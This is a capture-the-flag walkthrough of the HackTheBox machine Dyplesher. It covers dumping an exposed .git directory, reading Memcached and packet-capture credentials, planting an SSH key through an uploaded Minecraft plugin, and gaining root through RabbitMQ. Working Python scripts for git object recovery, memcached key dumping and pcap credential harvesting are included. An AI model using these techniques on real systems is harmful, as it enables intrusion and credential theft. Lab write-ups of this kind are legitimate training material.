Hackthebox — Dyplesher

Summary

Today we have another retired Linux machine, Dyplesher, at 10.10.10.190.

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.190
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-15 14:48 EET
Nmap scan report for 10.10.10.190
Host is up (0.079s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7e:ca:81:78:ec:27:8f:50:60:db:79:cf:97:f7:05:c0 (RSA)
| 256 e0:d7:c7:9f:f2:7f:64:0d:40:29:18:e1:a1:a0:37:5e (ECDSA)
|_ 256 9f:b2:4c:5c:de:44:09:14:ce:4f:57:62:0b:f9:71:81 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dyplesher
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gogs=968c960820a086d9; Path=/; HttpOnly
| Set-Cookie: _csrf=zfXkCZCCL03J-dCZ6lH25oupVLg6MTU5MjIyNTY4NDkwODc4OTk3Ng%3D%3D; Path=/; Expires=Tue, 16 Jun 2020 12:54:44 GMT; HttpOnly
| Date: Mon, 15 Jun 2020 12:54:44 GMT
| <!DOCTYPE html>
| <html>
| <head data-suburl="">
| <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
| <meta name="author" content="Gogs" />
| <meta name="description" content="Gogs is a painless self-hosted Git service" />
| <meta name="keywords" content="go, git, self-hosted, gogs">
| <meta name="referrer" content="no-referrer" />
| <meta name="_csrf" content="zfXkCZCCL03J-dCZ6lH25oupVLg6MTU5MjIyNTY4NDkwODc4OTk3Ng==" />
| <meta name="_suburl" content="" />
| <meta proper
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gogs=4228884f43ce6ee5; Path=/; HttpOnly
| Set-Cookie: _csrf=8sEcAMp478CzoxzyIS5f8nL8ZPg6MTU5MjIyNTY5MDU4Njg0NzI2OA%3D%3D; Path=/; Expires=Tue, 16 Jun 2020 12:54:50 GMT; HttpOnly
| Date: Mon, 15 Jun 2020 12:54:50 GMT
| <!DOCTYPE html>
| <html>
| <head data-suburl="">
| <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
| <meta name="author" content="Gogs" />
| <meta name="description" content="Gogs is a painless self-hosted Git service" />
| <meta name="keywords" content="go, git, self-hosted, gogs">
| <meta name="referrer" content="no-referrer" />
| <meta name="_csrf" content="8sEcAMp478CzoxzyIS5f8nL8ZPg6MTU5MjIyNTY5MDU4Njg0NzI2OA==" />
| <meta name="_suburl" content="" />
|_ <meta
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.70%I=7%D=6/15%Time=5EE76E3F%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,2063,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\
SF:x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;
SF:\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gogs=968c960820a086d9;\
SF:x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=zfXkCZCCL03J-dCZ6lH25oup
SF:VLg6MTU5MjIyNTY4NDkwODc4OTk3Ng%3D%3D;\x20Path=/;\x20Expires=Tue,\x2016\
SF:x20Jun\x202020\x2012:54:44\x20GMT;\x20HttpOnly\r\nDate:\x20Mon,\x2015\x
SF:20Jun\x202020\x2012:54:44\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<he
SF:ad\x20data-suburl=\"\">\n\t<meta\x20http-equiv=\"Content-Type\"\x20cont
SF:ent=\"text/html;\x20charset=UTF-8\"\x20/>\n\t<meta\x20http-equiv=\"X-UA
SF:-Compatible\"\x20content=\"IE=edge\"/>\n\t\n\t\t<meta\x20name=\"author\
SF:"\x20content=\"Gogs\"\x20/>\n\t\t<meta\x20name=\"description\"\x20conte
SF:nt=\"Gogs\x20is\x20a\x20painless\x20self-hosted\x20Git\x20service\"\x20
SF:/>\n\t\t<meta\x20name=\"keywords\"\x20content=\"go,\x20git,\x20self-hos
SF:ted,\x20gogs\">\n\t\n\t<meta\x20name=\"referrer\"\x20content=\"no-refer
SF:rer\"\x20/>\n\t<meta\x20name=\"_csrf\"\x20content=\"zfXkCZCCL03J-dCZ6lH
SF:25oupVLg6MTU5MjIyNTY4NDkwODc4OTk3Ng==\"\x20/>\n\t<meta\x20name=\"_subur
SF:l\"\x20content=\"\"\x20/>\n\t\n\t\n\t\n\t\t<meta\x20proper")%r(Help,67,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20
SF:charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(
SF:HTTPOptions,189F,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20
SF:text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;\x2
SF:0Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gogs=4228884f43ce6ee5;\x20
SF:Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=8sEcAMp478CzoxzyIS5f8nL8ZPg
SF:6MTU5MjIyNTY5MDU4Njg0NzI2OA%3D%3D;\x20Path=/;\x20Expires=Tue,\x2016\x20
SF:Jun\x202020\x2012:54:50\x20GMT;\x20HttpOnly\r\nDate:\x20Mon,\x2015\x20J
SF:un\x202020\x2012:54:50\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head\
SF:x20data-suburl=\"\">\n\t<meta\x20http-equiv=\"Content-Type\"\x20content
SF:=\"text/html;\x20charset=UTF-8\"\x20/>\n\t<meta\x20http-equiv=\"X-UA-Co
SF:mpatible\"\x20content=\"IE=edge\"/>\n\t\n\t\t<meta\x20name=\"author\"\x
SF:20content=\"Gogs\"\x20/>\n\t\t<meta\x20name=\"description\"\x20content=
SF:\"Gogs\x20is\x20a\x20painless\x20self-hosted\x20Git\x20service\"\x20/>\
SF:n\t\t<meta\x20name=\"keywords\"\x20content=\"go,\x20git,\x20self-hosted
SF:,\x20gogs\">\n\t\n\t<meta\x20name=\"referrer\"\x20content=\"no-referrer
SF:\"\x20/>\n\t<meta\x20name=\"_csrf\"\x20content=\"8sEcAMp478CzoxzyIS5f8n
SF:L8ZPg6MTU5MjIyNTY5MDU4Njg0NzI2OA==\"\x20/>\n\t<meta\x20name=\"_suburl\"
SF:\x20content=\"\"\x20/>\n\t\n\t\n\t\n\t\t<meta");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.99 seconds
root@strike:~#

We have three open ports: 22 (SSH, OpenSSH 8.0p1), 80 (Apache 2.4.41) and 3000. Nmap could not name the service on 3000, but the fingerprint gives it away: the i_like_gogs cookie and the <meta name="author" content="Gogs"> tag show it is a Gogs self-hosted Git service.

Web Enumeration

The site references additional virtual hosts (dyplesher.htb and test.dyplesher.htb), so I added them to /etc/hosts.

Fuzzing test.dyplesher.htb for files and directories:

root@strike:~# wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt --hc 404,403 -c

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://test.dyplesher.htb/FUZZ
Total requests: 4614

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 14 L 27 W 239 Ch ""
000009: C=200 1 L 2 W 23 Ch ".git/HEAD"
002021: C=200 14 L 27 W 239 Ch "index.php"
Total time: 38.83439
Processed Requests: 4614
Filtered Requests: 4611
Requests/sec.: 118.8122

root@strike:~#

The .git/HEAD hit means the repository metadata is exposed. Directory listing on /.git/ is forbidden (403), so the browser shows nothing useful, but the individual files under it are still readable, which is all the git-dumper tool needs to reconstruct the repository:

root@strike:~/git-dumper# ./git-dumper.py http://test.dyplesher.htb/.git /root/Dsktop/dump
[-] Testing http://test.dyplesher.htb/.git/HEAD [200]
[-] Testing http://test.dyplesher.htb/.git/ [403]
[-] Fetching common files
[-] Fetching http://test.dyplesher.htb/.gitignore [404]
[-] Fetching http://test.dyplesher.htb/.git/COMMIT_EDITMSG [200]
[-] Fetching http://test.dyplesher.htb/.git/description [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-commit.sample [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/commit-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-receive.sample [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-update.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-commit.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-receive.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/index [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/info/packs [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-push.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/update.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/info/exclude [200]
[-] Finding refs/
[-] Fetching http://test.dyplesher.htb/.git/FETCH_HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/HEAD [200]
[-] Fetching http://test.dyplesher.htb/.git/ORIG_HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/config [200]
[-] Fetching http://test.dyplesher.htb/.git/info/refs [404]
[-] Fetching http://test.dyplesher.htb/.git/logs/HEAD [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/heads/master [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/remotes/origin/HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/remotes/origin/master [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/stash [404]
[-] Fetching http://test.dyplesher.htb/.git/packed-refs [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/heads/master [200]
[-] Fetching http://test.dyplesher.htb/.git/refs/remotes/origin/HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/remotes/origin/master [200]
[-] Fetching http://test.dyplesher.htb/.git/refs/stash [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/wip/wtree/refs/heads/master [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/wip/index/refs/heads/master [404]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://test.dyplesher.htb/.git/objects/27/29b565f353181a03b2e2edb030a0e2b33d9af0 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] Fetching http://test.dyplesher.htb/.git/objects/b1/fe9eddcdf073dc45bb406d47cde1704f222388 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/3f/91e452f3cbfa322a3fbd516c5643a6ebffc433 [200]
[-] Running git checkout .
root@strike:~/git-dumper#
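
The reason the dump works despite the 403 on /.git/ is that git objects are content-addressed: starting from the SHA-1 in refs/heads/master, each object can be requested by name and parsed to find the next ones. The walker below is an added example (not git-dumper's own code) that shows that commit -> tree -> blob traversal. The fetch function is injected, so the same logic runs against an HTTP target (the http_fetcher helper assumes the standard objects/xx/yyyy layout) or, as in the demo, against a constructed in-memory repository.

```python
"""Walk an exposed .git directory object by object, the way git-dumper does."""
import hashlib
import urllib.request
import zlib


def make_object(kind: bytes, payload: bytes):
    """Build a loose git object ('<kind> <size>\\0<payload>', zlib-compressed) and its SHA-1."""
    raw = kind + b" " + str(len(payload)).encode() + b"\0" + payload
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def parse_object(compressed: bytes):
    """Inflate a loose object and split the header from the payload."""
    raw = zlib.decompress(compressed)
    header, _, payload = raw.partition(b"\0")
    kind, size = header.split(b" ")
    if int(size) != len(payload):
        raise ValueError("git object size header does not match payload")
    return kind.decode(), payload


def referenced_objects(kind: str, payload: bytes):
    """Return the SHA-1s a commit or tree points at (blobs reference nothing)."""
    refs = []
    if kind == "commit":
        for line in payload.split(b"\n"):
            if line.startswith((b"tree ", b"parent ")):
                refs.append(line.split(b" ", 1)[1].decode())
            elif line == b"":
                break  # end of headers; the commit message follows
    elif kind == "tree":
        pos = 0
        while pos < len(payload):
            nul = payload.index(b"\0", pos)
            # entry layout: "<mode> <name>\0" followed by a 20-byte raw SHA-1
            refs.append(payload[nul + 1:nul + 21].hex())
            pos = nul + 21
    return refs


def walk(fetch, start_sha: str):
    """Breadth-first fetch of every object reachable from start_sha.

    fetch(sha) returns the compressed object bytes, or None when the server
    does not have it (an HTTP 404, e.g. an object that only lives in a packfile).
    """
    seen, queue, objects = set(), [start_sha], {}
    while queue:
        sha = queue.pop(0)
        if sha in seen:
            continue
        seen.add(sha)
        data = fetch(sha)
        if data is None:
            continue
        kind, payload = parse_object(data)
        objects[sha] = (kind, payload)
        queue.extend(referenced_objects(kind, payload))
    return objects


def http_fetcher(base_url: str):
    """Fetch loose objects from an exposed .git over HTTP (assumed objects/xx/yyyy layout)."""
    def fetch(sha):
        url = f"{base_url.rstrip('/')}/objects/{sha[:2]}/{sha[2:]}"
        try:
            with urllib.request.urlopen(url, timeout=10) as resp:
                return resp.read()
        except Exception:
            return None
    return fetch


def build_demo_repo():
    """Constructed sample repository: one commit -> one tree -> one blob."""
    store = {}
    blob_sha, blob = make_object(b"blob", b"<?php $memcache_pass = 'example'; ?>\n")
    store[blob_sha] = blob
    tree_sha, tree = make_object(b"tree", b"100644 index.php\0" + bytes.fromhex(blob_sha))
    store[tree_sha] = tree
    commit_sha, commit = make_object(
        b"commit",
        b"tree " + tree_sha.encode() + b"\n"
        b"author A <a@example> 0 +0000\ncommitter A <a@example> 0 +0000\n\ninitial commit\n")
    store[commit_sha] = commit
    return store, commit_sha, tree_sha, blob_sha


if __name__ == "__main__":
    store, head, _, _ = build_demo_repo()
    for sha, (kind, payload) in walk(store.get, head).items():
        print(sha, kind, len(payload))
    # Against a live target: walk(http_fetcher("http://test.dyplesher.htb/.git"), "<sha from refs/heads/master>")
```

Objects stored only inside packfiles are not reachable this way (they come back 404), which is why git-dumper also checks objects/info/packs; here the listing was 404, so everything was loose and the walk recovered it all.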

In the dumped index.php I found the Memcached credentials: username felamos, password zxcvbnm, service port 11211.
Let's take a look using memcached-cli:

root@strike:~# memcached-cli felamos:zxcvbnm@dyplesher.htb
dyplesher.htb> get username
MinatoTWfelamosyuntao
dyplesher.htb> get password
$2a$10$5SAkMNF9fPNamlpWr.ikte0rHInGcU54tvazErpuwGPFePuI1DCJa
$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK
$2a$10$zXNCus.UXtiuJE5e6lsQGefnAH3zipl.FRNySz5C4RjitiwUoalS
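
memcached-cli hides what is actually on the wire. The text protocol is simple enough to speak by hand, and that matters for one practical reason: you only get values for keys you already know, and the write-up guessed "username" and "password". The client below is an added example (not the memcached-cli tool) that parses get replies and also enumerates key names with stats items followed by stats cachedump per slab class. Host and port are the ones from index.php; the demo responses are constructed bytes in the exact wire format so the parsers run offline.

```python
"""Query memcached over its plain-text protocol and enumerate the keys it holds."""
import socket


def parse_values(data: bytes) -> dict:
    """Parse a 'get' reply: VALUE <key> <flags> <bytes>\\r\\n<data>\\r\\n ... END\\r\\n."""
    values, pos = {}, 0
    while True:
        line_end = data.index(b"\r\n", pos)
        line = data[pos:line_end]
        if line == b"END":
            return values
        if not line.startswith(b"VALUE "):
            raise ValueError(f"unexpected line {line!r}")
        _, key, _flags, length = line.split(b" ")[:4]   # an optional cas id may follow
        start = line_end + 2
        values[key.decode()] = data[start:start + int(length)]
        pos = start + int(length) + 2                   # skip the data and its \r\n


def parse_stats(data: bytes) -> dict:
    """Parse 'STAT <name> <value>' lines (from 'stats' or 'stats items') into a dict."""
    stats = {}
    for line in data.split(b"\r\n"):
        if line.startswith(b"STAT "):
            _, name, value = line.split(b" ", 2)
            stats[name.decode()] = value.decode()
    return stats


def slab_ids(stats_items: dict) -> list:
    """Slab class ids present in 'stats items' output (keys look like items:<id>:number)."""
    return sorted({int(k.split(":")[1]) for k in stats_items if k.startswith("items:")})


def cachedump_keys(data: bytes) -> list:
    """Key names from 'stats cachedump <slab> <limit>': ITEM <key> [<bytes> b; <time> s]."""
    return [line.split(b" ")[1].decode()
            for line in data.split(b"\r\n") if line.startswith(b"ITEM ")]


class MemcachedText:
    """Minimal text-protocol client; the text protocol itself has no authentication."""

    def __init__(self, host="dyplesher.htb", port=11211, timeout=5):
        self.sock = socket.create_connection((host, port), timeout=timeout)

    def _command(self, cmd: bytes) -> bytes:
        self.sock.sendall(cmd + b"\r\n")
        buf = b""
        while not buf.endswith(b"END\r\n"):
            chunk = self.sock.recv(4096)
            if not chunk:
                break
            buf += chunk
        return buf

    def get(self, *keys) -> dict:
        return parse_values(self._command(b"get " + " ".join(keys).encode()))

    def dump_keys(self, limit=100) -> list:
        """Discover key names without knowing them: one cachedump per slab class."""
        keys = []
        for slab in slab_ids(parse_stats(self._command(b"stats items"))):
            keys += cachedump_keys(self._command(f"stats cachedump {slab} {limit}".encode()))
        return keys


# Constructed responses in wire format, used to exercise the parsers offline.
DEMO_GET = (b"VALUE username 0 21\r\nMinatoTWfelamosyuntao\r\n"
            b"VALUE password 0 11\r\nexamplehash\r\n"
            b"END\r\n")
DEMO_ITEMS = b"STAT items:1:number 2\r\nSTAT items:1:age 10\r\nSTAT items:5:number 1\r\nEND\r\n"
DEMO_DUMP = b"ITEM username [21 b; 0 s]\r\nITEM password [11 b; 0 s]\r\nEND\r\n"

if __name__ == "__main__":
    print(parse_values(DEMO_GET))
    print(slab_ids(parse_stats(DEMO_ITEMS)), cachedump_keys(DEMO_DUMP))
    # Against the real target: MemcachedText().dump_keys()
```

stats cachedump only returns the first part of each slab, so on a large cache it is a sample rather than a full listing; newer memcached builds also offer lru_crawler metadump all for a complete key list.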

The username key holds three user names run together (MinatoTW, felamos and yuntao) and the password key holds three bcrypt hashes, one with cost 10, one with cost 12 ($2y$12$) and one with cost 10. I tried to crack them with john.

After that I looked at the Gogs instance on http://dyplesher.htb:3000, registered an account and logged in.

Under the felamos user there are two repositories, gitlab.git and memcached.git.
I tried to log in with felamos's credentials.

Let's download repo.zip and unzip it:

root@strike:~# cd Downloads/
root@strike:~/Downloads# unzip repo.zip
Archive: repo.zip
creating: repositories/
creating: repositories/@hashed/
creating: repositories/@hashed/4b/
creating: repositories/@hashed/4b/22/
inflating: repositories/@hashed/4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
creating: repositories/@hashed/4e/
creating: repositories/@hashed/4e/07/
creating: repositories/@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/
inflating: repositories/@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
creating: repositories/@hashed/6b/
creating: repositories/@hashed/6b/86/
inflating: repositories/@hashed/6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
creating: repositories/@hashed/d4/
creating: repositories/@hashed/d4/73/
inflating: repositories/@hashed/d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle
root@strike:~/Downloads#

The archive contains four git bundle files named by hash (the .bundle files). A bundle can be cloned like any other repository, so I put a git clone for each one in hash.sh:

root@strike:~/Downloads# cat hash.sh 
git clone 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
git clone 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
git clone 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
git clone d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle
root@strike:~/Downloads# chmod +x hash.sh
root@strike:~/Downloads# ./hash.sh
Cloning into '4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a'...
Receiving objects: 100% (39/39), 10.46 KiB | 10.46 MiB/s, done.
Resolving deltas: 100% (12/12), done.
Cloning into '4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce'...
Receiving objects: 100% (51/51), 20.94 MiB | 59.55 MiB/s, done.
Resolving deltas: 100% (5/5), done.
Cloning into '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'...
Receiving objects: 100% (85/85), 30.69 KiB | 10.23 MiB/s, done.
Resolving deltas: 100% (40/40), done.
Cloning into 'd4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35'...
Receiving objects: 100% (21/21), 16.98 KiB | 16.98 MiB/s, done.
Resolving deltas: 100% (9/9), done.
root@strike:~/Downloads#

Searching the cloned repositories turned up a user.db file containing a bcrypt hash:

$2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6

Let's crack it. John recognises the $2a$ prefix as bcrypt, and the password comes out as alexis1.

Logging in again with the new credentials, user felamos@dyplesher.htb and password alexis1, works.

Then I found the AddPlugin page and uploaded a few files to see how it responds.

We can also see that http://test.dyplesher.htb is deployed under /var/www/test/ and is owned by MinatoTW, so a plugin that the server loads runs as that user.

For the IDE in which to write the Minecraft plugin, Eclipse works.

Create a blank Spigot plugin and put the payload in it.

The payload appends your SSH public key to MinatoTW's authorized_keys. Upload the built plugin on http://dyplesher.htb/home/add and load it on http://dyplesher.htb/home/reload.

Now connect over SSH to the MinatoTW account with your key:

root@strike:~/Desktop#ssh -i id_rsa MinatoTW@dyplesher.htb
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-46-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 15 Jun 2020 03:05:00 PM UTC

System load: 0.37 Processes: 238
Usage of /: 6.7% of 97.93GB Users logged in: 0
Memory usage: 39% IP address for ens33: 10.10.10.190
Swap usage: 0% IP address for docker0: 172.17.0.1


57 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
MinatoTW@dyplesher:~$

There is no user flag for MinatoTW. Looking around, the MinatoTW account belongs to the wireshark group, and there is a capture.pcap on the box, so I downloaded it and analysed it.

The capture contains credentials for several users:
*MinatoTW : bihys1amFov
*yuntao : wagthAw4ob / EashAnicOc3Op
*felamos : tieb0graQueg
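
The write-up does not show how the passwords were pulled out of capture.pcap, so here is an added example (not the author's procedure) that does it with the standard library only: it reads the classic libpcap format, decodes Ethernet/IPv4/TCP, and greps every TCP payload for the usual cleartext-login shapes (USER/PASS commands, form fields, HTTP Basic). The sample capture is constructed inline with made-up credentials; the real file would be passed as bytes to find_credentials.

```python
"""Pull cleartext credentials out of a libpcap capture with the standard library only."""
import re
import struct

LINKTYPE_ETHERNET = 1
CRED_PATTERNS = [
    re.compile(rb"^(USER|PASS)\s+(\S+)", re.I | re.M),                             # FTP / POP3 style
    re.compile(rb"(?:username|user|login|password|pass|passwd)=([^&\s]+)", re.I),  # form posts
    re.compile(rb"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.I),              # HTTP Basic
]


def iter_packets(pcap: bytes):
    """Yield (timestamp, frame_bytes) from a libpcap file; handles both byte orders."""
    magic = pcap[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic libpcap file (pcapng is not handled here)")
    _, _, _, _, _, linktype = struct.unpack(endian + "HHiIII", pcap[4:24])
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    pos = 24
    while pos + 16 <= len(pcap):
        ts_sec, ts_usec, incl_len, _orig = struct.unpack(endian + "IIII", pcap[pos:pos + 16])
        pos += 16
        yield ts_sec + ts_usec / 1e6, pcap[pos:pos + incl_len]
        pos += incl_len


def tcp_payload(frame: bytes):
    """Return (src, dst, sport, dport, payload) for IPv4/TCP frames, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType must be IPv4
        return None
    ip = frame[14:]
    if ip[9] != 6:                                        # protocol must be TCP
        return None
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return src, dst, sport, dport, tcp[data_off:]


def find_credentials(pcap: bytes):
    """Scan every TCP payload and return (src, dst, dport, matched_text) tuples."""
    hits = []
    for _ts, frame in iter_packets(pcap):
        parsed = tcp_payload(frame)
        if not parsed:
            continue
        src, dst, _sport, dport, payload = parsed
        for pat in CRED_PATTERNS:
            for m in pat.finditer(payload):
                hits.append((src, dst, dport, m.group(0).decode(errors="replace").strip()))
    return hits


def _frame(src, dst, sport, dport, payload: bytes) -> bytes:
    """Build a minimal Ethernet/IPv4/TCP frame (checksums left zero; the parser ignores them)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp


def build_demo_pcap() -> bytes:
    """Constructed capture with fake credentials: an FTP-style login and an HTTP form post."""
    frames = [
        _frame("10.10.14.2", "10.10.10.190", 40000, 21, b"USER alice\r\n"),
        _frame("10.10.14.2", "10.10.10.190", 40000, 21, b"PASS s3cret\r\n"),
        _frame("10.10.14.2", "10.10.10.190", 40001, 80,
               b"POST /login HTTP/1.1\r\nHost: x\r\n\r\nemail=bob%40x.htb&password=hunter2"),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1592233500 + i, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    for src, dst, dport, text in find_credentials(build_demo_pcap()):
        print(f"{src} -> {dst}:{dport}  {text}")
    # Real capture: find_credentials(open("capture.pcap", "rb").read())
```

Wireshark's own Tools > Credentials does the same job interactively, but a script like this is easier to run on a box where you only have a shell, and extending CRED_PATTERNS is how you adapt it to whatever protocol the capture turns out to carry.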

Try felamos with this password.

That gives the user flag!

Privilege Escalation

I found a Lua script running, so a malicious plugin fed to it can give us root.

The Lua plugin and the Python script for RabbitMQ are here:
https://github.com/khanmoin/htb_scripts/tree/master/rabbitmq_dyp

  • Write the Lua script on the Dyplesher machine with your own id_rsa.pub
  • Write the Python script on your own machine
  • Launch a Python web server on the Dyplesher machine
  • Run the Python script

Response

Let's try to connect

It works! Root flag obtained.

If you learned anything useful from this write-up, respect me on HackTheBox.

Thanks for your time!

Ahmed Samir
CTFer | Computer Science Student